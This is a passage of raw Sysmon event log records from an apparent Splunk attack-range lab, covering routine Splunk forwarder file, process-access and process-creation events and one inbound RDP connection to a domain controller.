Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4DBC85257DC1A82F8D81854C4E15B17,SHA256=060F2109F37974A8985A7AA092A8487877C53E3A8179E35FA308A07EA9A68F20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:29.843{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5FD5FDAF8159922193809AC892A44D,SHA256=E8AB7447999F6300D8E6655953F4C2014B91A25CF40EE39FA88A13E66D080B3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:28.093{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53590-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x8000000000000000977295Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.380{69CF5F33-891D-6151-9479-00000000FD01}2504932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977294Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D166E75EE1EE6FA5C85E7064FF17EB8F,SHA256=3A29466C48330BFD346743DF8543BE9AA2F8EB7246C77F22768135F1BDDB6A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977293Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E9E5551597941C671002D451815A140,SHA256=1B5558CC0416CFF8EC6AAB3902AD66C4DC61493A67AD04ECD4D2DB5C3EB5FA13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977292Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-891D-6151-9479-00000000FD01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977291Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977290Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977289Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977288Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977287Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977286Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977285Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977284Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977283Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977282Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-891D-6151-9479-00000000FD01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977281Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.192{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-891D-6151-9479-00000000FD01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977280Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.177{69CF5F33-891D-6151-9479-00000000FD01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:29.743{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09218A104B05EF6600CA014417955448,SHA256=46929B8B85231E015E750E38F68A635593E26980C5B0B0B2B7DDD4916356FC09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.909{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:30.908{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 